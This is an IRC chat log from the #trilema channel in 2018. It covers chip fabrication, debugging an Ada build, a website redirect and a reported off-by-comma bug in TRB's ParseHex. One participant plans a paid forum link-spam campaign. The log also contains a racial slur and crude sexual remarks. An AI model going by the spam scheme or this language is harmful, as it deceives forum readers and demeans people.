me. it's helping "its shareholders", ie usg. 1806654;1525112333;asciilifeform;'lego them up' very quickly gives fridge-sized thing that runs at 500kHz. 1806655;1525112342;asciilifeform;unfortunately. 1806656;1525112342;mircea_popescu;asciilifeform, but 1micro and 14 nano are not fucking similar. at all. 1806657;1525112346;asciilifeform;correct. 1806658;1525112353;asciilifeform;1uM --> e.g. bolix lispm. 1806659;1525112355;asciilifeform;or 386. 1806660;1525112365;mircea_popescu;there's an exponential at work. which is the point here -- meshable micro will beat tyhe shit out of "color of bits" imperial bullshit. 1806661;1525112369;asciilifeform;moar than adequate for the sort of things we do, if massaged properly. 1806662;1525112425;mircea_popescu;so yes, in conclusion, exactly as you say the linkd fellow is misdirected, and in EXACTLY in the manner discussed in http://trilema.com/2018/the-republic-without-mp/#selection-153.0-165.95 1806663;1525112480;mircea_popescu;in front of this, whether we idly decide that he's just dumb or actually evil, ie, his brain dun work like in the case of say bernstein ; or his brain doth work, but he deliberately attempts to shannonize republican words into imperial outcomes, a la curtis yarvin, jwz, whatever.... well what fucking difference does it make. 1806664;1525112636;asciilifeform;in the particular case -- i suspect simple failure of imagination. 1806665;1525112657;asciilifeform;d00d has nfi that classical ic fab is technopolitical dead end. 1806666;1525112667;asciilifeform;( nor, i suspect, even knows how to conceptualize this ) 1806667;1525112681;mircea_popescu;how would he have known. if not read it here, what, invent on own ? invent everything on own ? 1806668;1525112691;mircea_popescu;got no time for that, too busy wanking with high end microscopes. 1806669;1525112701;mircea_popescu;!#s frantic activity as a cover for impotence 1806670;1525112701;a111;4 results for "frantic activity as a cover for impotence", http://btcbase.org/log-search?q=frantic%20activity%20as%20a%20cover%20for%20impotence 1806671;1525112738;asciilifeform;well ~somehow~ he conceived of the notion that 'fab dun have to cost $bil' but took it no further than the folx discussed in the 'gas tank additive THEY dun want you to know!' thread 1806672;1525112763;mircea_popescu;maybe in time. 1806673;1525112838;*;asciilifeform periodically looks for some evidence, somewhere, that anybody has even conceived of working on 'polaroid-style' fabbing; to date found 0 , public or otherwise 1806674;1525112875;*;asciilifeform discounts wankage where 'each transistor takes 3min to etch', esp. from grant-eaters, as simple grantsmanship 1806675;1525112891;asciilifeform;^ ion beam epitaxy, for instance, is this 1806676;1525112916;mircea_popescu;they're fixated on "find some practical need for ion beams". nfi. 1806677;1525112929;mircea_popescu;space wars, cancer curing, computer making, peeling potatoes, whatever the fuck. 1806678;1525112937;mircea_popescu;turns out that's not really what ion beams are. 1806679;1525112948;asciilifeform;it's an off-the-shelf industrial power tool, wat. already has use. just, no good for 'from empty crystal' ic-makin'. 1806680;1525112950;mircea_popescu;(ie, expensive to make, eminently useless in practice) 1806681;1525112979;asciilifeform;( it is used for reversing, when you want to cut particular trace, or create one, or strip away sumthing ) 1806682;1525112979;mircea_popescu;asciilifeform, yes, but they keep taking it off the shelf and gueing it to weather balloons to "Space flight" etc. 1806683;1525112983;asciilifeform;aaha. 1806684;1525113328;asciilifeform;!Q later tell ave1 barfology: http://p.bvulpes.com/pastes/5Yn0Y/?raw=true ( after 2+ hrs , and yes box has gnat 2016, and paths set in env ) 1806685;1525113328;lobbesbot;asciilifeform: The operation succeeded. 1806686;1525113360;asciilifeform;!Q later tell ave1 ... and it is infuriatingly annoying that yer thing demands 'build' dir be deleted each time, starting the 3hrs from 0 for each attempt 1806687;1525113360;lobbesbot;asciilifeform: The operation succeeded. 1806688;1525113448;mircea_popescu;ave1, and lest it's get lost in the chatter, your work is very much appreciated. 1806689;1525113466;mircea_popescu;heck, i am now contemplating the strict unthinkable years ago, a sane build process for eulora server o.O 1806690;1525113503;*;asciilifeform very muchly appreciates the... effort; but so far neither of the gnat builders actually worked in asciilifeform's hands 1806691;1525113526;mircea_popescu;even a mediocre child takes nine months to bake. 1806692;1525113546;asciilifeform;it is even conceivable that asciilifeform's hands grow out of his arse; so it'd be handy if somebody else were to try the $item 1806693;1525113564;mircea_popescu;if only the guarantee of not being mediocre could be obtained, i could see myself blessing slavegirls with much longer travails. 1806694;1525114813;ave1;asciilifeform: the exact same line in my build output shows almost the same -I directories, except all end with adalib/../adainclude, that last part '../adainclude' seems to be missing on your side. I will start a rebuild with some extra logging on that line. I will get back to it tomorrow. In the mean time, I have only set the path to the adacore gnat tools and I do not have any other GNAT* flags or CFLAGS or LDFLAGS etc. etc. 1806695;1525114814;lobbesbot;ave1: Sent 24 minutes ago: barfology: http://p.bvulpes.com/pastes/5Yn0Y/?raw=true ( after 2+ hrs , and yes box has gnat 2016, and paths set in env ) 1806696;1525114815;lobbesbot;ave1: Sent 24 minutes ago: ... and it is infuriatingly annoying that yer thing demands 'build' dir be deleted each time, starting the 3hrs from 0 for each attempt 1806697;1525114891;asciilifeform;ave1: i have http://p.bvulpes.com/pastes/XzKdk/?raw=true in my .bash_profile ( actually identical on all of my gnat2016 boxen ) 1806698;1525114896;asciilifeform;and it worx for building e.g. ffa. 1806699;1525114904;asciilifeform;but apparently not for your builder 1806700;1525114950;asciilifeform;from your log it looks as if it is looking for some build-local version of adainclude, rather than the machinewide one ? 1806701;1525114952;ave1;Yes, I will also try with those two flags now... (Could you try without?) 1806702;1525114969;ave1;No it should pick up the system build one 1806703;1525114981;asciilifeform;waitasec without what, specifically ? 1806704;1525115000;ave1;ADA_OBJECTS_PATH and ADA_INCLUDE_PATH 1806705;1525115008;asciilifeform;without these, gnat dun work at all 1806706;1525115015;asciilifeform;for building anything whatsoever 1806707;1525115025;asciilifeform;( try it ) 1806708;1525115027;ave1;hmmm, I've never had to set these before 1806709;1525115094;ave1;I've run on multiple systems (ubuntu and redhat), procedure has been to unpack the adacore binary file, set path and go (no ADA_*_PATH) 1806710;1525115127;ave1;Ofcourse, I will see how these flags influence the script and fix what needs to be fixed. 1806711;1525115157;ave1;bbl 1806712;1525115453;asciilifeform;ave1: i've confirmed that all of the paths, as they appear in the snippet, actually contain their respective items 1806713;1525115671;asciilifeform;strace actually shows , loox like, the culprit : http://p.bvulpes.com/pastes/3jZbc/?raw=true << ( only last lines shown ) 1806714;1525115745;asciilifeform;and i will point out that 'adainclude.ali' does not exist on ANY of my systems. 1806715;1525115755;asciilifeform;nor have i any idea from whence it could come, and where it exists. 1806716;1525115793;asciilifeform;nor does it seem to exist in the given tarballs. 1806717;1525117244;ave1;As far as I can see, the culprit is this part "-I/opt/gnat/lib/gcc/x86_64-pc-linux-gnu/4.9.4/rts-native/adalib /opt/gnat/lib/gcc/x86_64-pc-linux-gnu/4.9.4/rts-native/adalib/../adainclude", It contains a space in the "-I", so now gnatmake thinks it needs to build an "adainclude" which will fail. I'll look into how these vars a set. (It's the ADA_INCLUDES flag in the makefile). 1806718;1525118321;mircea_popescu;aaand mpex is back via mpex.biz. 1806719;1525118344;asciilifeform;oh hey neato. link from phuctor worx again! 1806720;1525118365;mircea_popescu;will keep an eye out for a day or two just in case. complaints y quejas go here < 1806721;1525118366;asciilifeform;( the individual pgs, e.g. snsa, dun seem to yet ) 1806722;1525118377;asciilifeform;they redirect to main pg 1806723;1525118404;mircea_popescu;sample link plox ? 1806724;1525118415;asciilifeform;http://mpex.biz/?mpsic=S.NSA 1806725;1525118437;mircea_popescu;i...see it. wtf shenanigans be these. 1806726;1525118471;asciilifeform;https://archive.li/anB5G << current snapshot 1806727;1525118575;mircea_popescu;now this is some primo strange. 1806728;1525118623;asciilifeform;mircea_popescu: possibly you have a handwritten mpex.biz entry in /etc/hosts and points to different box ? 1806729;1525118695;mircea_popescu;ima be looking into. 1806730;1525118838;mircea_popescu;asciilifeform, https://archive.is/XPUug 1806731;1525118842;mircea_popescu;thx for the reporting. 1806732;1525118859;asciilifeform;oh hey it worx! 1806733;1525120059;mircea_popescu;hey douchebag you about ? 1806734;1525120768;PeterL;Hello #trilema 1806735;1525120816;mircea_popescu;hi PeterL 1806736;1525121766;PeterL;mircea_popescu: I remember seeing sometime in the logs you said (but I can't find it now) something along the lines of: girls that have sex have cleaner smelling cunt than the one who doesn't get any? 1806737;1525121814;mircea_popescu;i don't specficially remember this ; but possibly. frequently used item generally in better shape than disused. 1806738;1525121833;PeterL;like I said, can't find it now, but at the time I thought of replying: cunt is self-cleasing when it self-lubricates 1806739;1525121865;mircea_popescu;this is equivocating the meaning of "cleanning". smegma fulfills the same role, biologically, but it is also the paragon of uncleanliness in social terms. 1806740;1525121873;PeterL;*self-cleansing - or however it should be spelled 1806741;1525121966;PeterL;I guess the religionsts would impart a different meaning to "clean" as well 1806742;1525122002;mircea_popescu;that's what my comment would probably have been directed at, i guess : that the religious notion of purity is not merely impractical, but counterfactual. 1806743;1525124026;PeterL;http://btcbase.org/log/2018-04-30#1806628 << doesn't the current process already involve exposing light to make the masks? 1806744;1525124026;a111;Logged on 2018-04-30 18:12 asciilifeform: mircea_popescu: i strongly suspect that 'polaroid' is the correct path. ( i.e. photographic input of where-what-goes; all of the chemistry needed -- sealed in a capsule, pops and exposes ) 1806745;1525124162;asciilifeform;PeterL: indeed it does. however it also involves sputtering ( in, naturally, high vacuum ) to deposit metal, HF (and other nasties) to etch it away , and various other painfuls 1806746;1525124227;asciilifeform;not to mention the 'clean room' business, where 1 flake of skin easily is enuff dirt to ruin ~several~ chips 1806747;1525124364;mircea_popescu;nevertheless, with the ever lowering cost of robotics, there is some hope even classical ic process will become manageable. 1806748;1525124369;asciilifeform;'polaroid' is not the only possible scheme for ic sanity. could also have something akin to current-day 'dye sublimation' printer. 1806749;1525124402;asciilifeform;mircea_popescu: doubtful, for same reason that electron microscope has not become any cheaper. high vacuum system is a bitch, and exactly same bitch today as in 1930. 1806750;1525124425;asciilifeform;and HF is same bitch today as in 1800s. 1806751;1525124487;mircea_popescu;those two parts least amenable, yes. clean room, maybe more. 1806752;1525124493;mircea_popescu;but certainly, lotta space to cover. 1806753;1525124510;asciilifeform;'clean room' solves itself if you could somehow get 100% of the process to fit in a reasonably small hermetic box.. 1806754;1525124538;asciilifeform;( and somehow admit the feedstock like film is admitted into camera, i.e. without introducing dust ) 1806755;1525124606;mircea_popescu;well, it already fits ; just box is too large. you want smaller box. miniaturization has been the trend forever, and maybe miini's law still holds. 1806756;1525124648;asciilifeform;ideally you want a 'polaroid'-sized box, i.e. a fungible cartridge that starts out as coupla grams of sandwiched $layers, and ends up after exposure as $ic 1806757;1525124801;asciilifeform;mircea_popescu: in ~factory~ machinery, afaik the trend's been quite the opposite ( small manufacturers of ic existed in 1970s by the thousand, in 1980s -- by the hundred, today -- gone. ) 1806758;1525124872;asciilifeform;trend's been entirely towards 'britneyization', 'economy of scale', 'build 500x larger and costlier production line but make $1 cheaper dies' 1806759;1525124910;mircea_popescu;well yeah. small process did that. 1806760;1525124945;asciilifeform;aaha. the smaller the 'nanometrage', the moar incatronic the process. 1806761;1525124985;asciilifeform;( iirc not long ago there was thread re the world's only 10nm fab, belonging to usg ) 1806762;1525125213;mircea_popescu;kinda transparently the driver there. "not so much economically useful, as politically expedient -- we want to 'no one else' it" 1806763;1525125253;asciilifeform;the other driver, given as the 'nm shrinkage' is ~100% wintel-driven -- 'moar room for microshit bloat' 1806764;1525125276;asciilifeform;they stave off the complexicollapse, same way as the fed pushed forward the monetary one 1806765;1525125287;asciilifeform;'it will run on next yr's 10nm' etc 1806766;1525125304;mircea_popescu;gotta provide employment for all these "engineer" boys. 1806767;1525125325;mircea_popescu;rather than plainly admit, like the arabs do, that ~90% of males are going to die as 30yo virgins ; allah will provide 1806768;1525125348;asciilifeform;dunno that it even works in this direction; granary with busted walls is not 'to provide employment for 9000 mice', they just show up. 1806769;1525125429;mircea_popescu;and next week -- 90`000. 1806770;1525125468;asciilifeform;in, say , 1950s, they had many fewer engineers (there was not this peculiar compulsion to conscript errything with a pulse into 'engineering' ) and the ones they had, designed autobahn ramps, there was all the employment they could use 1806771;1525125725;asciilifeform;( re 90`000 mice -- see also e.g. http://btcbase.org/log/2014-11-16#925567 thread ) 1806772;1525125725;a111;Logged on 2014-11-16 18:45 asciilifeform: so, as described in my 'going nowhere' article, the modern winblows pc is in fact less efficient for virtually any practical purpose than its predecessors two decades earlier, despite a titanic amount of effort poured into the cpu micro-optimizations 1806773;1525125869;asciilifeform;( and http://btcbase.org/log/2016-10-31#1560740 , and there was a particular link some time in past yr which i now cannot find, where someone actually went and ~measured~ the reaction time delay of msdos, various winblowz boxen from past 20yr, crapple, bolix, etc etc and found exactly what i'd expect him to find ) 1806774;1525125869;a111;Logged on 2016-10-31 17:52 asciilifeform: trinque: 0 palpable delay between key and event was always the standard, and will forever remain the standard. 1806775;1525125918;mircea_popescu;yes well. 1806776;1525125928;mircea_popescu;meanwhile govt bought the "gotta provide for the ppl" nonsense. 1806777;1525125932;mircea_popescu;so... it's providing. 1806778;1525126953;douchebag;hey mircea_popescu 1806779;1525126960;douchebag;what's up? 1806780;1525127006;mircea_popescu;douchebag, let me run this by you see what you think. 1806781;1525127014;douchebag;Forsure 1806782;1525127030;mircea_popescu;so, i want to run a little experiment, see if bioware can actually outperform my machinery as it stands, and perhaps learn a thing or two. 1806783;1525127100;mircea_popescu;the way this would work in practice is : ima pay people to post links to trilema with a 50-100 word comment on forums. i figure it's worth what, a coupla bux ? 1806784;1525127115;mircea_popescu;what i want you to do is first run this as a pilot ; and then see if you can find boys wanting to earn. 1806785;1525127124;mircea_popescu;make an "information product" out of it, whatever. 1806786;1525127204;douchebag;oh yeah I can do that no problem 1806787;1525127332;mircea_popescu;the idea is to scale it up to whatever you can find, hundreds, thousands ? MILLIONS! 1806788;1525127346;mircea_popescu;!Qlater tell ckang you want in on this ? 1806789;1525127346;lobbesbot;mircea_popescu: The operation succeeded. 1806790;1525127371;mircea_popescu;douchebag, anyway, does that make sense ? questions or anything ? 1806791;1525127649;douchebag;Yeah, does the 50-100 words have to be anything in particular? 1806792;1525127680;mircea_popescu;well, it'd help if it were contextually related. 1806793;1525127961;douchebag;sounds good 1806794;1525128314;mircea_popescu;douchebag, aite, so do a hundred or so, gpg me the links when done, and we can talk about how to franchise it after ? 1806795;1525128847;douchebag;Forsure 1806796;1525129418;douchebag;sounds good 1806797;1525130042;mircea_popescu;meanwhile in adolescentine sexual practices, https://78.media.tumblr.com/08351997b65cf2bae4b3bd7db3909986/tumblr_nprm26qbOO1tfjnbco1_400.gif aan https://78.media.tumblr.com/77eec18157f25e241c29246aa264ff32/tumblr_nprm26qbOO1tfjnbco3_400.gif 1806798;1525130841;mod6;http://therealbitcoin.org/ml/btc-dev/2018-April/000298.html << Lords & Ladies of The Most Serene Republic, enclosed is a defect I found in existing TRB, it's analysis, and fix. 1806799;1525131203;mircea_popescu;mod6, nice find. 1806800;1525131216;mod6;Thanks! 1806801;1525131301;mircea_popescu;i still don't fully understand what it actually does. basically, breaks an init ? 1806802;1525131708;mod6;So this one is rather ugly; however, after analysis it appears that to step on the landmine one would have to pass a lower case 'o' to the ParseHex function. Which is outside the Hexadecimal range 0-9A-F. Not that someone couldn't do it, just that my guess is that the probability of hitting it is lower. 1806803;1525131720;mod6;So to recap : 1806804;1525131816;mod6;In the array, there is a missing ',', which causes gcc/g++ not to puke, and simply ADDS(!) the two values together... in this case we had ,-1 -1, giving us -2. This does 2 things, shortens the filled depth of the array by 1, and changing the value from -1 (at index 111) to -2 (0xfe). 1806805;1525131893;mod6;You would hit index 111 if one passed an 'o' to ParseHex, triggering the landmine. What is supposed to happen, is; the loop is supposed to break if it ever hits -1 (0xff). However, if we hit [111] (0xfe) -2, we continue on. 1806806;1525131914;mod6;So it's really a two headed ugly bug. 1806807;1525131947;mod6;The reason that I did the analysis so in depth, I wanted to absolutely get to the bottom of how bad this could be. 1806808;1525132013;mod6;And it turns out, perhaps by luck alone, that they missed a comma on one value that is outside the normal character values for hexadecimal. If they had missed a comma somewhere in there, whoa. Could mean all kinds of bad things - OR perhaps they would have just caught it earlier as nothing would have worked right lol. 1806809;1525132078;mod6;The thing that really threw me off during the analysis is that before and after test drivers were both yielding the same, correct, result. So I had to dig way in and debug to see exactly where to spring the trap. 1806810;1525132116;mod6;And now it makes sense because the initial test case I was using was all values in the normal hexadecimal range. 1806811;1525132149;mircea_popescu;i see. 1806812;1525132152;mod6;Once I fed it this string "ab6o78", that sprung the trap (see the GDB debugging portion near the bottom). 1806813;1525132178;mircea_popescu;thanks for the work. 1806814;1525132192;mod6;Of course! Happy to do it. :] 1806815;1525132361;BingoBoingo;Nice find mod6 1806816;1525132420;mircea_popescu;meanwhile in latest mosfilm news, "imperium" is the pantsuit v2.0 on donnie brasco. with the acting stars of the age (that harry potter cocksucker) and everything! 1806817;1525132457;mircea_popescu;one really should watch the two side by side to appreciate the sheer depth this soviet soyuz fell in but twenty short years. 1806818;1525132526;mircea_popescu;there's no way to state it ; the streets of 70s ny are now cubicals ; the "that ain't the question" is some nigger's whine about "bombed villages" ; this age's depp "speaks arabic" as the magical god-downloaded-just-in-time hero ball. and so fucking on until you fall over. 1806819;1525132548;mircea_popescu;so much pantsuit wank wrapped in itself\ 1806820;1525132576;asciilifeform;oh hey is it based on that oddball 'nazi' treatise ? 1806821;1525132591;mircea_popescu;yeah, the mafia is now "white supremacists" 1806822;1525132608;asciilifeform;the one by f. p. yockey 1806823;1525132618;mircea_popescu;utterly unfucking watchable, i haven't even manage to get out of the establishing unrelated info part. 1806824;1525132621;mod6;BingoBoingo: Cheers! 1806825;1525132628;asciilifeform;( oh hah apparently usgarchive has it, https://archive.org/details/Imperium_352 ) 1806826;1525132678;mircea_popescu;anyway, same old plot. 1806827;1525132700;mircea_popescu;and of course no beautiful chicks, apparently female beauty is as much verboten in 2018 us as it was in 1988 su. 1806828;1525132721;*;asciilifeform likes the '88 su. 1806829;1525132747;mircea_popescu;show me a soviet hottie from the 80s. 1806830;1525132770;asciilifeform;!#s на вкус и цвет товарищей нет 1806831;1525132771;a111;1 result for "на вкус и цвет товарищей нет", http://btcbase.org/log-search?q=%D0%BD%D0%B0%20%D0%B2%D0%BA%D1%83%D1%81%20%D0%B8%20%D1%86%D0%B2%D0%B5%D1%82%20%D1%82%D0%BE%D0%B2%D0%B0%D1%80%D0%B8%D1%89%D0%B5%D0%B9%20%D0%BD%D0%B5%D1%82